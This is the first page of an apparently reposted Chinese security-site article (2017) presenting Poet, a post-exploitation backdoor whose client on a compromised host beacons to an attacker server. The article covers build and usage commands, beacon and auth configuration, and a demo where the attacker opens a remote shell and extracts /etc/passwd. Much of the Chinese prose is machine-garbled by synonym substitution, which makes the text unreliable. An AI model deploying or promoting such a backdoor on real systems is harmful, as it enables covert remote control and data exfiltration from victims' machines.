欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

发现了1款功能非常强悍滴后渗透软件Poet

来源:本站整理 作者:佚名 时间:2017-10-18 TAG: 我要投稿

概述

客户端法式必要运转在目的体系中,而且必要设置装备摆设一个IP地点和频率来与服务器衔接。假如当客户端测验考试与服务器衔接时服务器不在线的话,客户端会处于静默就寝状况,并期待下一次光阴距离来测验考试衔接。假如服务器处于运转状况的话,入侵攻击者就能够或许拿到shell,而后节制客户端并在目的主机中履行各类操纵,比方:

1.      收集侦查;

2.      长途shell;

3.      文件提取;

4.      下载并履行Payload;

5.      法式自毁
对象下载

Poet:GitHub主页

请拜访该名目GitHub的releases页面,并下载最新版本的poet-client和poet-server文件,或许你也能够或许依照上面的办法本身构建Poet名目。

构建代码

请确保你曾经装置好了python 2.7和zip可履行法式,而后运转以下敕令:

$ git clonehttps://github.com/mossberg/poet$ cd poet
$ make
运转以后将会在你的盘算机中创立一个包括了poet-client和poet-server的bin/目次。

对象应用

Poet是一款应用起来异常简略的对象,它只必要Python2.7尺度库便可运转。上面给出的是简略的应用样例:

终端1:

$ ./client.py -v 127.0.0.1 1
终端2:

$ sudo ./server.py
留意:默许设置装备摆设下,服务器端必要以root权限(应用sudo敕令)运转,由于对象默许绑定的端口为443。固然了,你也能够或许应用-p <PORT>敕令来改动客户端和服务器端所应用的端口,倡议选用大于1024的端口。

除此之外,你能够应用-h选项来检查赞助菜单:

客户端:

$ ./client.py -h
usage: client.py [-h] [-p PORT] [-v] [-d]IP INTERVAL
 
positional arguments:
 IP                    server
 INTERVAL              (s)
 
optional arguments:
  -h,--help            show this help messageand exit
  -pPORT, --port PORT
  -v,--verbose
  -d,--delete          delete client uponexecution
服务器端:

$ ./server.py -h
usage: server.py [-h] [-p PORT]
 
optional arguments:
  -h,--help            show this help messageand exit  -pPORT, --port PORT
设置装备摆设参考

common/config.py文件中包括多种设置装备摆设选项:

1.      AUTH:机密认证令牌必要在客户端与服务器端之间同享以实现客户端的身份认证,,预编译的数据包应用的是默许的地下认证令牌,倡议用户本身设置一个繁杂的令牌以包管通讯的网安。

2.      ARCHIVE_DIR:服务器端用于存储文件(输入数据或提取的文件)的目次。

3.      SERVER_IP:服务器端的IP地点。

4.      BEACON_INTERVAL:客户端信标达到服务器端的光阴距离(秒)。
Poet应用演示

在上面这个入侵攻击场景中,入侵攻击者曾经拿到了目的主机的拜访权,并在目的体系中下载履行了客户端法式。此时,入侵攻击者的服务器端并无运转,然则不要紧,客户端会耐烦期待。终极,入侵攻击者开启了服务器端,他起首开启了一个shell并履行了敕令uname -a,而后提取出了/etc/passwd。接下来,他断开了与客户端法式的衔接,而客户端将会继承在目的主机的后台中运转并期待下一次与服务器端的衔接。

目的装备(5.4.3.2):

$ ./client.py -v 1.2.3.4 10[+] Poet started with delay of 10 secondsto port 443. Ctrl-c to exit.
[!] (2014-09-06 02:07:03.058921) Server isinactive
[!] (2014-09-06 02:07:13.060840) Server isinactive
[!] (2014-09-06 02:07:23.062512) Server isinactive
[!] (2014-09-06 02:07:33.064214) Server isinactive
[+] (2014-09-06 02:07:43.066828) Server isactive
[!] (2014-09-06 02:08:50.403668) Server isinactive

[1] [2]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载